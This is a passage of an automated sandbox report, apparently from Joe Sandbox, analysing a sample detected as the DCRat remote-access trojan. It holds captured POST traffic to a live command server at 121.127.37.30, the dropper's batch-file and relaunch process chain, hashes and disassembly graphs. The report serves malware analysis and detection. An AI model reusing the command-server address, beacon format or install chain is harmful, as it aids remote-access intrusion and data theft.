                                                Dec 5, 2024 16:04:02.069159985 CET2564OUTData Raw: 50 55 5a 5a 5b 5b 54 5e 5e 5e 51 57 50 5b 5a 5d 59 54 58 40 5b 57 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PUZZ[[T^^^QWP[Z]YTX@[WR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*/X',240Y>($^?C(Z)8 <?>W +^#'.9<!Y""Z)!


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                75192.168.2.750031121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:04:02.751642942 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1424
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:03.096868992 CET1424OUTData Raw: 50 57 5a 5e 5e 5b 54 53 5e 5e 51 57 50 53 5a 5e 59 56 58 43 5b 5f 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PWZ^^[TS^^QWPSZ^YVXC[_RQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9=<!0<1 74]>+0? Y=97"#R>#Z('[*+?!Y""Z)
                                                Dec 5, 2024 16:04:04.076395988 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:04.312241077 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 1d 23 5b 36 5a 20 5c 37 56 2e 2e 3c 10 27 20 3d 1d 26 1d 06 1f 32 2d 3e 0d 27 38 3f 18 35 3b 01 5e 36 3a 3c 05 34 2f 05 59 30 37 28 46 0c 1d 21 03 24 16 22 0f 2a 39 28 54 2d 3c 32 1f 3e 0a 3e 5a 2d 58 2d 0a 3e 33 3e 0a 3f 2a 3d 0d 31 06 09 03 27 14 32 5f 3c 30 24 03 26 25 20 53 00 14 25 54 2b 31 3a 0f 28 3c 25 58 22 2c 2c 55 28 5d 31 06 25 15 2e 50 25 24 30 04 25 3a 37 0c 23 09 20 08 3e 00 39 05 26 3c 38 5b 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: #[6Z \7V..<' =&2->'8?5;^6:<4/Y07(F!$"*9(T-<2>>Z-X->3>?*=1'2_<0$&% S%T+1:(<%X",,U(]1%.P%$0%:7# >9&<8[=#&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                76192.168.2.750032121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:04:02.871788025 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:03.221817970 CET2564OUTData Raw: 50 56 5f 58 5e 51 54 5d 5e 5e 51 57 50 58 5a 51 59 55 58 40 5b 54 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PV_X^QT]^^QWPXZQYUX@[TRX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^)2_',!T#;)'+%$\*9#Z!<#>1+(&-=(!Y""Z)-
                                                Dec 5, 2024 16:04:04.191463947 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:04.424211025 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                77192.168.2.750038121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:04:04.666766882 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:04:05.018726110 CET2564OUTData Raw: 50 56 5a 52 5b 5c 54 5e 5e 5e 51 57 50 52 5a 5f 59 5c 58 47 5b 52 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZR[\T^^^QWPRZ_Y\XG[RR\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9\*2X&,2#3)?+*9"?#*7X?(#$[:+/!Y""Z)
                                                Dec 5, 2024 16:04:05.986280918 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:06.224277020 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:05 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                78192.168.2.750043121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:04:06.476505995 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:06.831218958 CET2564OUTData Raw: 50 51 5a 59 5e 5f 51 59 5e 5e 51 57 50 53 5a 59 59 54 58 48 5b 57 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZY^_QY^^QWPSZYYTXH[WRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*?'2 '3*8X>&?*(!?<(27(;$^'.=(?!Y""Z)
                                                Dec 5, 2024 16:04:07.798830986 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:08.032321930 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:07 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                79192.168.2.750049121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:04:08.275660038 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:08.628185987 CET2564OUTData Raw: 55 51 5a 5b 5e 5c 54 59 5e 5e 51 57 50 53 5a 5a 59 53 58 46 5b 5e 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQZ[^\TY^^QWPSZZYSXF[^RQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^+/>3/94()+Y+&(\*_?Z"?4=1[+(8^'1T??!Y""Z)
                                                Dec 5, 2024 16:04:09.626641035 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:09.860270023 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:09 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:10:02:03
                                                Start date:05/12/2024
                                                Path:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\A5EbyKyjhV.exe"
                                                Imagebase:0xfc0000
                                                File size:2'551'808 bytes
                                                MD5 hash:48B90C11912E9C7147D86C55D1E2CC94
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                                                Imagebase:0x7ff79e380000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\chcp.com
                                                Wow64 process (32bit):false
                                                Commandline:chcp 65001
                                                Imagebase:0x7ff70d7e0000
                                                File size:14'848 bytes
                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\PING.EXE
                                                Wow64 process (32bit):false
                                                Commandline:ping -n 10 localhost
                                                Imagebase:0x7ff640910000
                                                File size:22'528 bytes
                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:10:02:16
                                                Start date:05/12/2024
                                                Path:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"
                                                Imagebase:0x460000
                                                File size:2'551'808 bytes
                                                MD5 hash:48B90C11912E9C7147D86C55D1E2CC94
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 74%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:9.4%
                                                  Total number of Nodes:32
                                                  Total number of Limit Nodes:2
                                                  execution_graph 21083 7ffaac51d13a 21084 7ffaac51d13f 21083->21084 21085 7ffaac51d02b 21084->21085 21088 7ffaac51d59a 21084->21088 21087 7ffaac51d160 21089 7ffaac51d5a5 GetSystemInfo 21088->21089 21091 7ffaac51d6c5 21089->21091 21091->21087 21058 7ffaac519ebd 21059 7ffaac57ff20 21058->21059 21062 7ffaac57f110 21059->21062 21061 7ffaac580009 21063 7ffaac57f11b 21062->21063 21064 7ffaac57f1be 21063->21064 21066 7ffaac57f1d7 21063->21066 21064->21061 21067 7ffaac57f22a ResumeThread 21066->21067 21068 7ffaac57f1e2 21066->21068 21070 7ffaac57f2f4 21067->21070 21068->21064 21070->21064 21071 7ffaac51d5d1 21072 7ffaac51d5ed GetSystemInfo 21071->21072 21074 7ffaac51d6c5 21072->21074 21050 7ffaac51bc35 21052 7ffaac51bc5f WriteFile 21050->21052 21053 7ffaac51bdcf 21052->21053 21054 7ffaac51da35 21055 7ffaac51da5f VirtualAlloc 21054->21055 21057 7ffaac51db7f 21055->21057 21075 7ffaac51a397 21076 7ffaac51a39c 21075->21076 21079 7ffaac519fb0 21076->21079 21078 7ffaac51a400 21080 7ffaac519fb9 CreateFileTransactedW 21079->21080 21082 7ffaac51bba8 21080->21082 21082->21078

                                                  Executed Functions

                                                  Function 00007FFAACAAB74F Relevance: 5.7, Strings: 4, Instructions: 740COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 785 7ffaacaab74f-7ffaacaab762 786 7ffaacaab764-7ffaacaabaa5 785->786 787 7ffaacaab7ae-7ffaacaab7c4 785->787 792 7ffaacaabaaf-7ffaacaabaee 786->792 788 7ffaacaab854-7ffaacaab884 787->788 789 7ffaacaab7ca-7ffaacaab7d2 787->789 801 7ffaacaab88a-7ffaacaab88b 788->801 802 7ffaacaab92e-7ffaacaab937 788->802 791 7ffaacaab7d8-7ffaacaab7ea 789->791 789->792 791->792 794 7ffaacaab7f0-7ffaacaab807 791->794 805 7ffaacaabaf0 792->805 795 7ffaacaab809-7ffaacaab810 794->795 796 7ffaacaab847-7ffaacaab84e 794->796 795->792 799 7ffaacaab816-7ffaacaab844 795->799 796->788 796->789 799->796 806 7ffaacaab88e-7ffaacaab8a4 801->806 803 7ffaacaab93d-7ffaacaab943 802->803 804 7ffaacaaba6f-7ffaacaaba95 802->804 803->792 808 7ffaacaab949-7ffaacaab958 803->808 813 7ffaacaabafb-7ffaacaabb91 805->813 806->792 807 7ffaacaab8aa-7ffaacaab8ce 806->807 809 7ffaacaab8d0-7ffaacaab8f3 call 7ffaacaa7710 807->809 810 7ffaacaab921-7ffaacaab928 807->810 811 7ffaacaaba62-7ffaacaaba69 808->811 812 7ffaacaab95e-7ffaacaab965 808->812 809->792 820 7ffaacaab8f9-7ffaacaab91f 809->820 810->802 810->806 811->803 811->804 812->792 815 7ffaacaab96b-7ffaacaab977 call 7ffaacaa7710 812->815 822 7ffaacaabb16-7ffaacaabb96 813->822 823 7ffaacaabb9c-7ffaacaabbdf 813->823 821 7ffaacaab97c-7ffaacaab987 815->821 820->809 820->810 824 7ffaacaab989-7ffaacaab9a0 821->824 825 7ffaacaab9c6-7ffaacaab9d5 821->825 822->823 831 7ffaacaabb38-7ffaacaabb98 822->831 840 7ffaacaabbe1-7ffaacaabc36 823->840 824->792 829 7ffaacaab9a6-7ffaacaab9c2 824->829 825->792 828 7ffaacaab9db-7ffaacaab9ff 825->828 832 7ffaacaaba02-7ffaacaaba1f 828->832 829->824 833 7ffaacaab9c4 829->833 831->823 843 7ffaacaabb5c-7ffaacaabb9a 831->843 832->792 838 7ffaacaaba25-7ffaacaaba40 832->838 835 7ffaacaaba42-7ffaacaaba58 833->835 835->792 839 7ffaacaaba5a-7ffaacaaba5e 835->839 838->832 838->835 839->811 850 7ffaacaabc41-7ffaacaabce7 840->850 843->823 847 7ffaacaabb7d-7ffaacaabb90 843->847 862 7ffaacaabe17-7ffaacaabe34 850->862 863 7ffaacaabced-7ffaacaac090 850->863 864 7ffaacaabe3a-7ffaacaabe3f 862->864 865 7ffaacaac141-7ffaacaac1a8 862->865 868 7ffaacaac0fe-7ffaacaac118 863->868 867 7ffaacaabe42-7ffaacaabe49 864->867 877 7ffaacaac318 865->877 869 7ffaacaabdcc-7ffaacaac139 867->869 870 7ffaacaabe4b-7ffaacaabe4f 867->870 869->865 870->840 873 7ffaacaabe55 870->873 876 7ffaacaabed3-7ffaacaabed6 873->876 878 7ffaacaabed9-7ffaacaabee0 876->878 877->877 879 7ffaacaabee6 878->879 880 7ffaacaabe57-7ffaacaabe8c call 7ffaacaabae0 878->880 881 7ffaacaabf56-7ffaacaabf5d 879->881 880->865 887 7ffaacaabe92-7ffaacaabea2 880->887 883 7ffaacaabee8-7ffaacaabf1a call 7ffaacaabae0 881->883 884 7ffaacaabf5f-7ffaacaabfa5 881->884 883->865 893 7ffaacaabf20-7ffaacaabf48 883->893 899 7ffaacaabd74-7ffaacaabd78 884->899 900 7ffaacaabfab-7ffaacaabfb0 884->900 887->840 889 7ffaacaabea8-7ffaacaabec5 887->889 889->865 892 7ffaacaabecb-7ffaacaabed0 889->892 892->876 893->865 894 7ffaacaabf4e-7ffaacaabf53 893->894 894->881 901 7ffaacaabdca 899->901 902 7ffaacaabd7a-7ffaacaabd97 899->902 903 7ffaacaac036-7ffaacaac03a 900->903 901->867 902->868 904 7ffaacaabfb5-7ffaacaabfe4 call 7ffaacaabae0 903->904 905 7ffaacaac040-7ffaacaac046 903->905 904->865 908 7ffaacaabfea-7ffaacaabffa 904->908 908->850 909 7ffaacaac000-7ffaacaac00f 908->909 909->865 910 7ffaacaac015-7ffaacaac028 909->910 910->878 911 7ffaacaac02e-7ffaacaac033 910->911 911->903
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6$r6
                                                  • API String ID: 0-596633268
                                                  • Opcode ID: 93bea826571818d65f5e5a95a31c7e952172dc8ebfdbf04fb31dead49ae9dea8
                                                  • Instruction ID: 4df2e0f7440d3e8f3f406194fdd18ecf2d5b6f7b9a024dec7ad4c75ea594fc8d
                                                  • Opcode Fuzzy Hash: 93bea826571818d65f5e5a95a31c7e952172dc8ebfdbf04fb31dead49ae9dea8
                                                  • Instruction Fuzzy Hash: 3152BF71929649CFEB59CF18E494AB877A2FF49300F5081BDD45FC7286EA38E845CB80
                                                  Function 00007FFAAC6E6CA9 Relevance: 3.2, Strings: 2, Instructions: 705COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1401 7ffaac6e6ca9-7ffaac6e6cba 1402 7ffaac6e6c68-7ffaac6e6c98 1401->1402 1403 7ffaac6e6cbc-7ffaac6e6ce4 1401->1403 1408 7ffaac6e6c9f-7ffaac6e6ca4 1402->1408 1406 7ffaac6e7001-7ffaac6e700b 1403->1406 1407 7ffaac6e6cea-7ffaac6e6cef 1403->1407 1414 7ffaac6e700c-7ffaac6e703a 1406->1414 1409 7ffaac6e6cf1-7ffaac6e6cf4 1407->1409 1410 7ffaac6e6cfb-7ffaac6e6d14 1407->1410 1409->1410 1412 7ffaac6e6d16-7ffaac6e6d26 1410->1412 1413 7ffaac6e6d28-7ffaac6e6d55 1410->1413 1412->1413 1413->1414 1418 7ffaac6e6d5b-7ffaac6e6d66 1413->1418 1419 7ffaac6e6fe8 1414->1419 1420 7ffaac6e703c-7ffaac6e707e 1414->1420 1421 7ffaac6e6e24-7ffaac6e6e29 1418->1421 1422 7ffaac6e6d6c-7ffaac6e6d7a 1418->1422 1430 7ffaac6e6fef-7ffaac6e7000 1419->1430 1449 7ffaac6e7080-7ffaac6e7086 1420->1449 1450 7ffaac6e709b-7ffaac6e70ac 1420->1450 1424 7ffaac6e6e2f-7ffaac6e6e39 1421->1424 1425 7ffaac6e6ebd-7ffaac6e6ec7 1421->1425 1422->1414 1426 7ffaac6e6d80-7ffaac6e6d91 1422->1426 1424->1414 1427 7ffaac6e6e3f-7ffaac6e6e53 1424->1427 1428 7ffaac6e6ee9-7ffaac6e6ef0 1425->1428 1429 7ffaac6e6ec9-7ffaac6e6ed4 1425->1429 1431 7ffaac6e6df9-7ffaac6e6e10 1426->1431 1432 7ffaac6e6d93-7ffaac6e6db6 1426->1432 1435 7ffaac6e6ef3-7ffaac6e6efd 1427->1435 1428->1435 1447 7ffaac6e6edb-7ffaac6e6ee7 1429->1447 1431->1414 1433 7ffaac6e6e16-7ffaac6e6e1e 1431->1433 1436 7ffaac6e6e58-7ffaac6e6e5d 1432->1436 1437 7ffaac6e6dbc-7ffaac6e6dcf 1432->1437 1433->1421 1433->1422 1435->1414 1438 7ffaac6e6f03-7ffaac6e6f1b 1435->1438 1441 7ffaac6e6dd3-7ffaac6e6df7 1436->1441 1437->1441 1438->1414 1443 7ffaac6e6f21-7ffaac6e6f39 1438->1443 1441->1431 1448 7ffaac6e6e62-7ffaac6e6e65 1441->1448 1443->1414 1444 7ffaac6e6f3f-7ffaac6e6f73 1443->1444 1444->1414 1479 7ffaac6e6f79-7ffaac6e6f8c 1444->1479 1447->1428 1452 7ffaac6e6e67-7ffaac6e6e77 1448->1452 1453 7ffaac6e6e7b-7ffaac6e6e88 1448->1453 1454 7ffaac6e7088-7ffaac6e7099 1449->1454 1455 7ffaac6e70e1-7ffaac6e711d 1449->1455 1456 7ffaac6e70ae-7ffaac6e70b9 1450->1456 1457 7ffaac6e70bd-7ffaac6e70df 1450->1457 1452->1453 1453->1414 1458 7ffaac6e6e8e-7ffaac6e6ebc 1453->1458 1454->1449 1454->1450 1474 7ffaac6e711f-7ffaac6e7132 1455->1474 1475 7ffaac6e711e 1455->1475 1456->1457 1469 7ffaac6e70e0 1457->1469 1474->1469 1483 7ffaac6e7134-7ffaac6e7137 1474->1483 1475->1474 1479->1430 1480 7ffaac6e6f8e-7ffaac6e6f99 1479->1480 1480->1430 1484 7ffaac6e6f9b-7ffaac6e6fb2 1480->1484 1486 7ffaac6e7138-7ffaac6e7149 1483->1486 1488 7ffaac6e6fc3-7ffaac6e6fe5 1484->1488 1489 7ffaac6e6fb4-7ffaac6e6fc2 1484->1489 1486->1475 1494 7ffaac6e714b-7ffaac6e7156 1486->1494 1488->1419 1489->1488 1497 7ffaac6e7158-7ffaac6e7189 1494->1497 1497->1486 1501 7ffaac6e718c-7ffaac6e718f 1497->1501 1503 7ffaac6e7190-7ffaac6e71a4 1501->1503 1506 7ffaac6e71a5-7ffaac6e71a8 1503->1506 1507 7ffaac6e71e2 1506->1507 1508 7ffaac6e71aa 1506->1508 1507->1503 1509 7ffaac6e71e4-7ffaac6e7202 1507->1509 1508->1497 1510 7ffaac6e71ac-7ffaac6e71af 1508->1510 1513 7ffaac6e71b0-7ffaac6e71bf 1509->1513 1515 7ffaac6e7204-7ffaac6e7211 1509->1515 1510->1513 1520 7ffaac6e71c0-7ffaac6e71d1 1513->1520 1519 7ffaac6e7214 1515->1519 1515->1520 1521 7ffaac6e7215-7ffaac6e7241 1519->1521 1520->1506 1520->1507 1529 7ffaac6e7243-7ffaac6e7258 1521->1529
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$d
                                                  • API String ID: 0-2243634771
                                                  • Opcode ID: 86aa5d8b0b0557261d33feaac99a94695a7d9d72f257c4614b06f617ed29c616
                                                  • Instruction ID: 9adef13d546300a875f389f97bb86376498f7ace9bddec01238bb48fa4cb2f22
                                                  • Opcode Fuzzy Hash: 86aa5d8b0b0557261d33feaac99a94695a7d9d72f257c4614b06f617ed29c616
                                                  • Instruction Fuzzy Hash: F3221771A0D7468FE74ADB28D4914F57BE0EF96310B1891BBE04ECB197DE24E80A87C1
